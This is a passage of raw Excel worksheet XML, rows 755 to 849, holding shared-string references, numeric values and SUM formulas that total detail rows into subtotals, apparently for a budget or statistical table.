      <c r="A755" s="10"/>
      <c r="B755" s="10"/>
      <c r="C755" s="28"/>
      <c r="D755" s="10" t="s">
        <v>5468</v>
      </c>
      <c r="E755" s="16" t="s">
        <v>3553</v>
      </c>
      <c r="F755" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="756" spans="1:6">
      <c r="A756" s="10"/>
      <c r="B756" s="10"/>
      <c r="C756" s="28"/>
      <c r="D756" s="10" t="s">
        <v>5469</v>
      </c>
      <c r="E756" s="16" t="s">
        <v>3554</v>
      </c>
      <c r="F756" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="757" spans="1:6">
      <c r="A757" s="10"/>
      <c r="B757" s="10"/>
      <c r="C757" s="28"/>
      <c r="D757" s="10" t="s">
        <v>5470</v>
      </c>
      <c r="E757" s="16" t="s">
        <v>3555</v>
      </c>
      <c r="F757" s="17">
        <v>404</v>
      </c>
    </row>
    <row r="758" spans="1:6">
      <c r="A758" s="10"/>
      <c r="B758" s="10"/>
      <c r="C758" s="28"/>
      <c r="D758" s="10" t="s">
        <v>5471</v>
      </c>
      <c r="E758" s="11" t="s">
        <v>3556</v>
      </c>
      <c r="F758" s="12">
        <f>SUM(F759:F761)</f>
        <v>0</v>
      </c>
    </row>
    <row r="759" spans="1:6">
      <c r="A759" s="10"/>
      <c r="B759" s="10"/>
      <c r="C759" s="28"/>
      <c r="D759" s="10" t="s">
        <v>5472</v>
      </c>
      <c r="E759" s="16" t="s">
        <v>3557</v>
      </c>
      <c r="F759" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="760" spans="1:6">
      <c r="A760" s="10"/>
      <c r="B760" s="10"/>
      <c r="C760" s="28"/>
      <c r="D760" s="10" t="s">
        <v>5473</v>
      </c>
      <c r="E760" s="16" t="s">
        <v>3558</v>
      </c>
      <c r="F760" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="761" spans="1:6">
      <c r="A761" s="10"/>
      <c r="B761" s="10"/>
      <c r="C761" s="31"/>
      <c r="D761" s="10" t="s">
        <v>5474</v>
      </c>
      <c r="E761" s="16" t="s">
        <v>3559</v>
      </c>
      <c r="F761" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="762" spans="1:6">
      <c r="A762" s="10"/>
      <c r="B762" s="10"/>
      <c r="C762" s="31"/>
      <c r="D762" s="10" t="s">
        <v>5475</v>
      </c>
      <c r="E762" s="11" t="s">
        <v>3560</v>
      </c>
      <c r="F762" s="12">
        <f>SUM(F763:F770)</f>
        <v>4693</v>
      </c>
    </row>
    <row r="763" spans="1:6">
      <c r="A763" s="10"/>
      <c r="B763" s="10"/>
      <c r="C763" s="31"/>
      <c r="D763" s="10" t="s">
        <v>5476</v>
      </c>
      <c r="E763" s="16" t="s">
        <v>3561</v>
      </c>
      <c r="F763" s="17">
        <v>2061</v>
      </c>
    </row>
    <row r="764" spans="1:6">
      <c r="A764" s="10"/>
      <c r="B764" s="10"/>
      <c r="C764" s="31"/>
      <c r="D764" s="10" t="s">
        <v>5477</v>
      </c>
      <c r="E764" s="16" t="s">
        <v>3562</v>
      </c>
      <c r="F764" s="17">
        <v>2628</v>
      </c>
    </row>
    <row r="765" spans="1:6">
      <c r="A765" s="10"/>
      <c r="B765" s="10"/>
      <c r="C765" s="31"/>
      <c r="D765" s="10" t="s">
        <v>5478</v>
      </c>
      <c r="E765" s="16" t="s">
        <v>3563</v>
      </c>
      <c r="F765" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="766" spans="1:6">
      <c r="A766" s="10"/>
      <c r="B766" s="10"/>
      <c r="C766" s="31"/>
      <c r="D766" s="10" t="s">
        <v>5479</v>
      </c>
      <c r="E766" s="16" t="s">
        <v>3564</v>
      </c>
      <c r="F766" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="767" spans="1:6">
      <c r="A767" s="10"/>
      <c r="B767" s="10"/>
      <c r="C767" s="31"/>
      <c r="D767" s="10" t="s">
        <v>5480</v>
      </c>
      <c r="E767" s="16" t="s">
        <v>3565</v>
      </c>
      <c r="F767" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="768" spans="1:6">
      <c r="A768" s="10"/>
      <c r="B768" s="10"/>
      <c r="C768" s="31"/>
      <c r="D768" s="10" t="s">
        <v>5481</v>
      </c>
      <c r="E768" s="16" t="s">
        <v>3566</v>
      </c>
      <c r="F768" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="769" spans="1:6">
      <c r="A769" s="10"/>
      <c r="B769" s="10"/>
      <c r="C769" s="31"/>
      <c r="D769" s="10" t="s">
        <v>5482</v>
      </c>
      <c r="E769" s="16" t="s">
        <v>3567</v>
      </c>
      <c r="F769" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="770" spans="1:6">
      <c r="A770" s="10"/>
      <c r="B770" s="10"/>
      <c r="C770" s="28"/>
      <c r="D770" s="10" t="s">
        <v>5483</v>
      </c>
      <c r="E770" s="16" t="s">
        <v>3568</v>
      </c>
      <c r="F770" s="17">
        <v>4</v>
      </c>
    </row>
    <row r="771" spans="1:6">
      <c r="A771" s="10"/>
      <c r="B771" s="10"/>
      <c r="C771" s="28"/>
      <c r="D771" s="10" t="s">
        <v>5484</v>
      </c>
      <c r="E771" s="11" t="s">
        <v>3569</v>
      </c>
      <c r="F771" s="12">
        <f>SUM(F772:F775)</f>
        <v>367</v>
      </c>
    </row>
    <row r="772" spans="1:6">
      <c r="A772" s="10"/>
      <c r="B772" s="10"/>
      <c r="C772" s="28"/>
      <c r="D772" s="10" t="s">
        <v>5485</v>
      </c>
      <c r="E772" s="16" t="s">
        <v>3570</v>
      </c>
      <c r="F772" s="17">
        <v>36</v>
      </c>
    </row>
    <row r="773" spans="1:6">
      <c r="A773" s="10"/>
      <c r="B773" s="10"/>
      <c r="C773" s="28"/>
      <c r="D773" s="10" t="s">
        <v>5486</v>
      </c>
      <c r="E773" s="16" t="s">
        <v>3571</v>
      </c>
      <c r="F773" s="17">
        <v>331</v>
      </c>
    </row>
    <row r="774" spans="1:6">
      <c r="A774" s="10"/>
      <c r="B774" s="10"/>
      <c r="C774" s="28"/>
      <c r="D774" s="10" t="s">
        <v>5487</v>
      </c>
      <c r="E774" s="16" t="s">
        <v>3572</v>
      </c>
      <c r="F774" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="775" spans="1:6">
      <c r="A775" s="10"/>
      <c r="B775" s="10"/>
      <c r="C775" s="28"/>
      <c r="D775" s="10" t="s">
        <v>5488</v>
      </c>
      <c r="E775" s="16" t="s">
        <v>3573</v>
      </c>
      <c r="F775" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="776" spans="1:6">
      <c r="A776" s="10"/>
      <c r="B776" s="10"/>
      <c r="C776" s="28"/>
      <c r="D776" s="10" t="s">
        <v>5489</v>
      </c>
      <c r="E776" s="11" t="s">
        <v>3574</v>
      </c>
      <c r="F776" s="12">
        <f>SUM(F777:F782)</f>
        <v>0</v>
      </c>
    </row>
    <row r="777" spans="1:6">
      <c r="A777" s="10"/>
      <c r="B777" s="10"/>
      <c r="C777" s="28"/>
      <c r="D777" s="10" t="s">
        <v>5490</v>
      </c>
      <c r="E777" s="16" t="s">
        <v>3575</v>
      </c>
      <c r="F777" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="778" spans="1:6">
      <c r="A778" s="10"/>
      <c r="B778" s="10"/>
      <c r="C778" s="28"/>
      <c r="D778" s="10" t="s">
        <v>5491</v>
      </c>
      <c r="E778" s="16" t="s">
        <v>3576</v>
      </c>
      <c r="F778" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="779" spans="1:6">
      <c r="A779" s="10"/>
      <c r="B779" s="10"/>
      <c r="C779" s="28"/>
      <c r="D779" s="10" t="s">
        <v>5492</v>
      </c>
      <c r="E779" s="16" t="s">
        <v>3577</v>
      </c>
      <c r="F779" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="780" spans="1:6">
      <c r="A780" s="10"/>
      <c r="B780" s="10"/>
      <c r="C780" s="28"/>
      <c r="D780" s="10" t="s">
        <v>5493</v>
      </c>
      <c r="E780" s="16" t="s">
        <v>3578</v>
      </c>
      <c r="F780" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="781" spans="1:6">
      <c r="A781" s="10"/>
      <c r="B781" s="10"/>
      <c r="C781" s="28"/>
      <c r="D781" s="10" t="s">
        <v>5494</v>
      </c>
      <c r="E781" s="16" t="s">
        <v>3579</v>
      </c>
      <c r="F781" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="782" spans="1:6">
      <c r="A782" s="10"/>
      <c r="B782" s="10"/>
      <c r="C782" s="28"/>
      <c r="D782" s="10" t="s">
        <v>5495</v>
      </c>
      <c r="E782" s="16" t="s">
        <v>3580</v>
      </c>
      <c r="F782" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="783" spans="1:6">
      <c r="A783" s="10"/>
      <c r="B783" s="10"/>
      <c r="C783" s="28"/>
      <c r="D783" s="10" t="s">
        <v>5496</v>
      </c>
      <c r="E783" s="11" t="s">
        <v>3581</v>
      </c>
      <c r="F783" s="12">
        <f>SUM(F784:F788)</f>
        <v>0</v>
      </c>
    </row>
    <row r="784" spans="1:6">
      <c r="A784" s="10"/>
      <c r="B784" s="10"/>
      <c r="C784" s="28"/>
      <c r="D784" s="10" t="s">
        <v>5497</v>
      </c>
      <c r="E784" s="16" t="s">
        <v>3582</v>
      </c>
      <c r="F784" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="785" spans="1:6">
      <c r="A785" s="10"/>
      <c r="B785" s="10"/>
      <c r="C785" s="28"/>
      <c r="D785" s="10" t="s">
        <v>5498</v>
      </c>
      <c r="E785" s="16" t="s">
        <v>3583</v>
      </c>
      <c r="F785" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="786" spans="1:6">
      <c r="A786" s="10"/>
      <c r="B786" s="10"/>
      <c r="C786" s="28"/>
      <c r="D786" s="10" t="s">
        <v>5499</v>
      </c>
      <c r="E786" s="16" t="s">
        <v>3584</v>
      </c>
      <c r="F786" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="787" spans="1:6">
      <c r="A787" s="10"/>
      <c r="B787" s="10"/>
      <c r="C787" s="28"/>
      <c r="D787" s="10" t="s">
        <v>5500</v>
      </c>
      <c r="E787" s="16" t="s">
        <v>3585</v>
      </c>
      <c r="F787" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="788" spans="1:6">
      <c r="A788" s="10"/>
      <c r="B788" s="10"/>
      <c r="C788" s="28"/>
      <c r="D788" s="10" t="s">
        <v>5501</v>
      </c>
      <c r="E788" s="16" t="s">
        <v>3586</v>
      </c>
      <c r="F788" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="789" spans="1:6">
      <c r="A789" s="10"/>
      <c r="B789" s="10"/>
      <c r="C789" s="28"/>
      <c r="D789" s="10" t="s">
        <v>5502</v>
      </c>
      <c r="E789" s="11" t="s">
        <v>3587</v>
      </c>
      <c r="F789" s="12">
        <f>SUM(F790:F791)</f>
        <v>0</v>
      </c>
    </row>
    <row r="790" spans="1:6">
      <c r="A790" s="10"/>
      <c r="B790" s="10"/>
      <c r="C790" s="28"/>
      <c r="D790" s="10" t="s">
        <v>5503</v>
      </c>
      <c r="E790" s="16" t="s">
        <v>3588</v>
      </c>
      <c r="F790" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="791" spans="1:6">
      <c r="A791" s="10"/>
      <c r="B791" s="10"/>
      <c r="C791" s="28"/>
      <c r="D791" s="10" t="s">
        <v>5504</v>
      </c>
      <c r="E791" s="16" t="s">
        <v>3589</v>
      </c>
      <c r="F791" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="792" spans="1:6">
      <c r="A792" s="10"/>
      <c r="B792" s="10"/>
      <c r="C792" s="28"/>
      <c r="D792" s="10" t="s">
        <v>5505</v>
      </c>
      <c r="E792" s="11" t="s">
        <v>3590</v>
      </c>
      <c r="F792" s="12">
        <f>SUM(F793:F794)</f>
        <v>0</v>
      </c>
    </row>
    <row r="793" spans="1:6">
      <c r="A793" s="10"/>
      <c r="B793" s="10"/>
      <c r="C793" s="28"/>
      <c r="D793" s="10" t="s">
        <v>5506</v>
      </c>
      <c r="E793" s="16" t="s">
        <v>3591</v>
      </c>
      <c r="F793" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="794" spans="1:6">
      <c r="A794" s="10"/>
      <c r="B794" s="10"/>
      <c r="C794" s="28"/>
      <c r="D794" s="10" t="s">
        <v>5507</v>
      </c>
      <c r="E794" s="16" t="s">
        <v>3592</v>
      </c>
      <c r="F794" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="795" spans="1:6">
      <c r="A795" s="10"/>
      <c r="B795" s="10"/>
      <c r="C795" s="28"/>
      <c r="D795" s="10" t="s">
        <v>5508</v>
      </c>
      <c r="E795" s="11" t="s">
        <v>3593</v>
      </c>
      <c r="F795" s="12">
        <f>F796</f>
        <v>0</v>
      </c>
    </row>
    <row r="796" spans="1:6">
      <c r="A796" s="10"/>
      <c r="B796" s="10"/>
      <c r="C796" s="28"/>
      <c r="D796" s="10" t="s">
        <v>5509</v>
      </c>
      <c r="E796" s="16" t="s">
        <v>3594</v>
      </c>
      <c r="F796" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="797" spans="1:6">
      <c r="A797" s="10"/>
      <c r="B797" s="10"/>
      <c r="C797" s="28"/>
      <c r="D797" s="10" t="s">
        <v>5510</v>
      </c>
      <c r="E797" s="11" t="s">
        <v>3595</v>
      </c>
      <c r="F797" s="12">
        <f>F798</f>
        <v>491</v>
      </c>
    </row>
    <row r="798" spans="1:6">
      <c r="A798" s="10"/>
      <c r="B798" s="10"/>
      <c r="C798" s="28"/>
      <c r="D798" s="10" t="s">
        <v>5511</v>
      </c>
      <c r="E798" s="16" t="s">
        <v>3596</v>
      </c>
      <c r="F798" s="17">
        <v>491</v>
      </c>
    </row>
    <row r="799" spans="1:6">
      <c r="A799" s="10"/>
      <c r="B799" s="10"/>
      <c r="C799" s="28"/>
      <c r="D799" s="10" t="s">
        <v>5512</v>
      </c>
      <c r="E799" s="11" t="s">
        <v>3597</v>
      </c>
      <c r="F799" s="12">
        <f>SUM(F800:F804)</f>
        <v>301</v>
      </c>
    </row>
    <row r="800" spans="1:6">
      <c r="A800" s="10"/>
      <c r="B800" s="10"/>
      <c r="C800" s="28"/>
      <c r="D800" s="10" t="s">
        <v>5513</v>
      </c>
      <c r="E800" s="16" t="s">
        <v>3598</v>
      </c>
      <c r="F800" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="801" spans="1:6">
      <c r="A801" s="10"/>
      <c r="B801" s="10"/>
      <c r="C801" s="28"/>
      <c r="D801" s="10" t="s">
        <v>5514</v>
      </c>
      <c r="E801" s="16" t="s">
        <v>3599</v>
      </c>
      <c r="F801" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="802" spans="1:6">
      <c r="A802" s="10"/>
      <c r="B802" s="10"/>
      <c r="C802" s="28"/>
      <c r="D802" s="10" t="s">
        <v>5515</v>
      </c>
      <c r="E802" s="16" t="s">
        <v>3600</v>
      </c>
      <c r="F802" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="803" spans="1:6">
      <c r="A803" s="10"/>
      <c r="B803" s="10"/>
      <c r="C803" s="28"/>
      <c r="D803" s="10" t="s">
        <v>5516</v>
      </c>
      <c r="E803" s="16" t="s">
        <v>3601</v>
      </c>
      <c r="F803" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="804" spans="1:6">
      <c r="A804" s="10"/>
      <c r="B804" s="10"/>
      <c r="C804" s="28"/>
      <c r="D804" s="10" t="s">
        <v>5517</v>
      </c>
      <c r="E804" s="16" t="s">
        <v>3602</v>
      </c>
      <c r="F804" s="17">
        <v>301</v>
      </c>
    </row>
    <row r="805" spans="1:6">
      <c r="A805" s="10"/>
      <c r="B805" s="10"/>
      <c r="C805" s="28"/>
      <c r="D805" s="10" t="s">
        <v>5518</v>
      </c>
      <c r="E805" s="11" t="s">
        <v>3603</v>
      </c>
      <c r="F805" s="12">
        <f>F806</f>
        <v>0</v>
      </c>
    </row>
    <row r="806" spans="1:6">
      <c r="A806" s="10"/>
      <c r="B806" s="10"/>
      <c r="C806" s="28"/>
      <c r="D806" s="10" t="s">
        <v>5519</v>
      </c>
      <c r="E806" s="16" t="s">
        <v>3604</v>
      </c>
      <c r="F806" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="807" spans="1:6">
      <c r="A807" s="10"/>
      <c r="B807" s="10"/>
      <c r="C807" s="28"/>
      <c r="D807" s="10" t="s">
        <v>5520</v>
      </c>
      <c r="E807" s="11" t="s">
        <v>3605</v>
      </c>
      <c r="F807" s="12">
        <f>F808</f>
        <v>0</v>
      </c>
    </row>
    <row r="808" spans="1:6">
      <c r="A808" s="10"/>
      <c r="B808" s="10"/>
      <c r="C808" s="28"/>
      <c r="D808" s="10" t="s">
        <v>5521</v>
      </c>
      <c r="E808" s="16" t="s">
        <v>3606</v>
      </c>
      <c r="F808" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="809" spans="1:6">
      <c r="A809" s="10"/>
      <c r="B809" s="10"/>
      <c r="C809" s="28"/>
      <c r="D809" s="10" t="s">
        <v>5522</v>
      </c>
      <c r="E809" s="11" t="s">
        <v>3607</v>
      </c>
      <c r="F809" s="12">
        <f>SUM(F810:F823)</f>
        <v>0</v>
      </c>
    </row>
    <row r="810" spans="1:6">
      <c r="A810" s="10"/>
      <c r="B810" s="10"/>
      <c r="C810" s="28"/>
      <c r="D810" s="10" t="s">
        <v>5523</v>
      </c>
      <c r="E810" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F810" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="811" spans="1:6">
      <c r="A811" s="10"/>
      <c r="B811" s="10"/>
      <c r="C811" s="28"/>
      <c r="D811" s="10" t="s">
        <v>5524</v>
      </c>
      <c r="E811" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F811" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="812" spans="1:6">
      <c r="A812" s="10"/>
      <c r="B812" s="10"/>
      <c r="C812" s="28"/>
      <c r="D812" s="10" t="s">
        <v>5525</v>
      </c>
      <c r="E812" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F812" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="813" spans="1:6">
      <c r="A813" s="10"/>
      <c r="B813" s="10"/>
      <c r="C813" s="28"/>
      <c r="D813" s="10" t="s">
        <v>5526</v>
      </c>
      <c r="E813" s="16" t="s">
        <v>3608</v>
      </c>
      <c r="F813" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="814" spans="1:6">
      <c r="A814" s="10"/>
      <c r="B814" s="10"/>
      <c r="C814" s="28"/>
      <c r="D814" s="10" t="s">
        <v>5527</v>
      </c>
      <c r="E814" s="16" t="s">
        <v>3609</v>
      </c>
      <c r="F814" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="815" spans="1:6">
      <c r="A815" s="10"/>
      <c r="B815" s="10"/>
      <c r="C815" s="28"/>
      <c r="D815" s="10" t="s">
        <v>5528</v>
      </c>
      <c r="E815" s="16" t="s">
        <v>3610</v>
      </c>
      <c r="F815" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="816" spans="1:6">
      <c r="A816" s="10"/>
      <c r="B816" s="10"/>
      <c r="C816" s="28"/>
      <c r="D816" s="10" t="s">
        <v>5529</v>
      </c>
      <c r="E816" s="16" t="s">
        <v>3611</v>
      </c>
      <c r="F816" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="817" spans="1:6">
      <c r="A817" s="10"/>
      <c r="B817" s="10"/>
      <c r="C817" s="28"/>
      <c r="D817" s="10" t="s">
        <v>5530</v>
      </c>
      <c r="E817" s="16" t="s">
        <v>3612</v>
      </c>
      <c r="F817" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="818" spans="1:6">
      <c r="A818" s="10"/>
      <c r="B818" s="10"/>
      <c r="C818" s="28"/>
      <c r="D818" s="10" t="s">
        <v>5531</v>
      </c>
      <c r="E818" s="16" t="s">
        <v>3613</v>
      </c>
      <c r="F818" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="819" spans="1:6">
      <c r="A819" s="10"/>
      <c r="B819" s="10"/>
      <c r="C819" s="28"/>
      <c r="D819" s="10" t="s">
        <v>5532</v>
      </c>
      <c r="E819" s="16" t="s">
        <v>3614</v>
      </c>
      <c r="F819" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="820" spans="1:6">
      <c r="A820" s="10"/>
      <c r="B820" s="10"/>
      <c r="C820" s="28"/>
      <c r="D820" s="10" t="s">
        <v>5533</v>
      </c>
      <c r="E820" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F820" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="821" spans="1:6">
      <c r="A821" s="10"/>
      <c r="B821" s="10"/>
      <c r="C821" s="28"/>
      <c r="D821" s="10" t="s">
        <v>5534</v>
      </c>
      <c r="E821" s="16" t="s">
        <v>3615</v>
      </c>
      <c r="F821" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="822" spans="1:6">
      <c r="A822" s="10"/>
      <c r="B822" s="10"/>
      <c r="C822" s="28"/>
      <c r="D822" s="10" t="s">
        <v>5535</v>
      </c>
      <c r="E822" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F822" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="823" spans="1:6">
      <c r="A823" s="10"/>
      <c r="B823" s="10"/>
      <c r="C823" s="28"/>
      <c r="D823" s="10" t="s">
        <v>5536</v>
      </c>
      <c r="E823" s="16" t="s">
        <v>3616</v>
      </c>
      <c r="F823" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="824" spans="1:6">
      <c r="A824" s="10"/>
      <c r="B824" s="10"/>
      <c r="C824" s="31"/>
      <c r="D824" s="10" t="s">
        <v>5537</v>
      </c>
      <c r="E824" s="11" t="s">
        <v>3617</v>
      </c>
      <c r="F824" s="12">
        <f>F825</f>
        <v>520</v>
      </c>
    </row>
    <row r="825" spans="1:6">
      <c r="A825" s="10"/>
      <c r="B825" s="10"/>
      <c r="C825" s="31"/>
      <c r="D825" s="10" t="s">
        <v>5538</v>
      </c>
      <c r="E825" s="16" t="s">
        <v>3618</v>
      </c>
      <c r="F825" s="17">
        <v>520</v>
      </c>
    </row>
    <row r="826" spans="1:6">
      <c r="A826" s="10"/>
      <c r="B826" s="10"/>
      <c r="C826" s="31"/>
      <c r="D826" s="10" t="s">
        <v>5539</v>
      </c>
      <c r="E826" s="11" t="s">
        <v>3619</v>
      </c>
      <c r="F826" s="12">
        <f>F827+F838+F840+F843+F845+F847</f>
        <v>13921</v>
      </c>
    </row>
    <row r="827" spans="1:6">
      <c r="A827" s="10"/>
      <c r="B827" s="10"/>
      <c r="C827" s="31"/>
      <c r="D827" s="10" t="s">
        <v>5540</v>
      </c>
      <c r="E827" s="11" t="s">
        <v>3620</v>
      </c>
      <c r="F827" s="12">
        <f>SUM(F828:F837)</f>
        <v>4772</v>
      </c>
    </row>
    <row r="828" spans="1:6">
      <c r="A828" s="10"/>
      <c r="B828" s="10"/>
      <c r="C828" s="31"/>
      <c r="D828" s="10" t="s">
        <v>5541</v>
      </c>
      <c r="E828" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F828" s="17">
        <v>1898</v>
      </c>
    </row>
    <row r="829" spans="1:6">
      <c r="A829" s="10"/>
      <c r="B829" s="10"/>
      <c r="C829" s="31"/>
      <c r="D829" s="10" t="s">
        <v>5542</v>
      </c>
      <c r="E829" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F829" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="830" spans="1:6">
      <c r="A830" s="10"/>
      <c r="B830" s="10"/>
      <c r="C830" s="31"/>
      <c r="D830" s="10" t="s">
        <v>5543</v>
      </c>
      <c r="E830" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F830" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="831" spans="1:6">
      <c r="A831" s="10"/>
      <c r="B831" s="10"/>
      <c r="C831" s="31"/>
      <c r="D831" s="10" t="s">
        <v>5544</v>
      </c>
      <c r="E831" s="16" t="s">
        <v>3621</v>
      </c>
      <c r="F831" s="17">
        <v>2737</v>
      </c>
    </row>
    <row r="832" spans="1:6">
      <c r="A832" s="10"/>
      <c r="B832" s="10"/>
      <c r="C832" s="31"/>
      <c r="D832" s="10" t="s">
        <v>5545</v>
      </c>
      <c r="E832" s="16" t="s">
        <v>3622</v>
      </c>
      <c r="F832" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="833" spans="1:6">
      <c r="A833" s="10"/>
      <c r="B833" s="10"/>
      <c r="C833" s="31"/>
      <c r="D833" s="10" t="s">
        <v>5546</v>
      </c>
      <c r="E833" s="16" t="s">
        <v>3623</v>
      </c>
      <c r="F833" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="834" spans="1:6">
      <c r="A834" s="10"/>
      <c r="B834" s="10"/>
      <c r="C834" s="31"/>
      <c r="D834" s="10" t="s">
        <v>5547</v>
      </c>
      <c r="E834" s="16" t="s">
        <v>3624</v>
      </c>
      <c r="F834" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="835" spans="1:6">
      <c r="A835" s="10"/>
      <c r="B835" s="10"/>
      <c r="C835" s="31"/>
      <c r="D835" s="10" t="s">
        <v>5548</v>
      </c>
      <c r="E835" s="16" t="s">
        <v>3625</v>
      </c>
      <c r="F835" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="836" spans="1:6">
      <c r="A836" s="10"/>
      <c r="B836" s="10"/>
      <c r="C836" s="31"/>
      <c r="D836" s="10" t="s">
        <v>5549</v>
      </c>
      <c r="E836" s="16" t="s">
        <v>3626</v>
      </c>
      <c r="F836" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="837" spans="1:6">
      <c r="A837" s="10"/>
      <c r="B837" s="10"/>
      <c r="C837" s="31"/>
      <c r="D837" s="10" t="s">
        <v>5550</v>
      </c>
      <c r="E837" s="16" t="s">
        <v>3627</v>
      </c>
      <c r="F837" s="17">
        <v>137</v>
      </c>
    </row>
    <row r="838" spans="1:6">
      <c r="A838" s="10"/>
      <c r="B838" s="10"/>
      <c r="C838" s="31"/>
      <c r="D838" s="10" t="s">
        <v>5551</v>
      </c>
      <c r="E838" s="11" t="s">
        <v>3628</v>
      </c>
      <c r="F838" s="12">
        <f>F839</f>
        <v>506</v>
      </c>
    </row>
    <row r="839" spans="1:6">
      <c r="A839" s="10"/>
      <c r="B839" s="10"/>
      <c r="C839" s="31"/>
      <c r="D839" s="10" t="s">
        <v>5552</v>
      </c>
      <c r="E839" s="16" t="s">
        <v>3629</v>
      </c>
      <c r="F839" s="17">
        <v>506</v>
      </c>
    </row>
    <row r="840" spans="1:6">
      <c r="A840" s="10"/>
      <c r="B840" s="10"/>
      <c r="C840" s="31"/>
      <c r="D840" s="10" t="s">
        <v>5553</v>
      </c>
      <c r="E840" s="11" t="s">
        <v>3630</v>
      </c>
      <c r="F840" s="12">
        <f>SUM(F841:F842)</f>
        <v>4139</v>
      </c>
    </row>
    <row r="841" spans="1:6">
      <c r="A841" s="10"/>
      <c r="B841" s="10"/>
      <c r="C841" s="31"/>
      <c r="D841" s="10" t="s">
        <v>5554</v>
      </c>
      <c r="E841" s="16" t="s">
        <v>3631</v>
      </c>
      <c r="F841" s="17">
        <v>2876</v>
      </c>
    </row>
    <row r="842" spans="1:6">
      <c r="A842" s="10"/>
      <c r="B842" s="10"/>
      <c r="C842" s="28"/>
      <c r="D842" s="10" t="s">
        <v>5555</v>
      </c>
      <c r="E842" s="16" t="s">
        <v>3632</v>
      </c>
      <c r="F842" s="17">
        <v>1263</v>
      </c>
    </row>
    <row r="843" spans="1:6">
      <c r="A843" s="10"/>
      <c r="B843" s="10"/>
      <c r="C843" s="28"/>
      <c r="D843" s="10" t="s">
        <v>5556</v>
      </c>
      <c r="E843" s="11" t="s">
        <v>3633</v>
      </c>
      <c r="F843" s="12">
        <f>F844</f>
        <v>4030</v>
      </c>
    </row>
    <row r="844" spans="1:6">
      <c r="A844" s="10"/>
      <c r="B844" s="10"/>
      <c r="C844" s="28"/>
      <c r="D844" s="10" t="s">
        <v>5557</v>
      </c>
      <c r="E844" s="16" t="s">
        <v>3634</v>
      </c>
      <c r="F844" s="17">
        <v>4030</v>
      </c>
    </row>
    <row r="845" spans="1:6">
      <c r="A845" s="10"/>
      <c r="B845" s="10"/>
      <c r="C845" s="28"/>
      <c r="D845" s="10" t="s">
        <v>5558</v>
      </c>
      <c r="E845" s="11" t="s">
        <v>3635</v>
      </c>
      <c r="F845" s="12">
        <f>F846</f>
        <v>0</v>
      </c>
    </row>
    <row r="846" spans="1:6">
      <c r="A846" s="10"/>
      <c r="B846" s="10"/>
      <c r="C846" s="28"/>
      <c r="D846" s="10" t="s">
        <v>5559</v>
      </c>
      <c r="E846" s="16" t="s">
        <v>3636</v>
      </c>
      <c r="F846" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="847" spans="1:6">
      <c r="A847" s="10"/>
      <c r="B847" s="10"/>
      <c r="C847" s="28"/>
      <c r="D847" s="10" t="s">
        <v>5560</v>
      </c>
      <c r="E847" s="11" t="s">
        <v>3637</v>
      </c>
      <c r="F847" s="12">
        <f>F848</f>
        <v>474</v>
      </c>
    </row>
    <row r="848" spans="1:6">
      <c r="A848" s="10"/>
      <c r="B848" s="10"/>
      <c r="C848" s="28"/>
      <c r="D848" s="10" t="s">
        <v>5561</v>
      </c>
      <c r="E848" s="16" t="s">
        <v>3638</v>
      </c>
      <c r="F848" s="17">
        <v>474</v>
      </c>
    </row>
    <row r="849" spans="1:6">
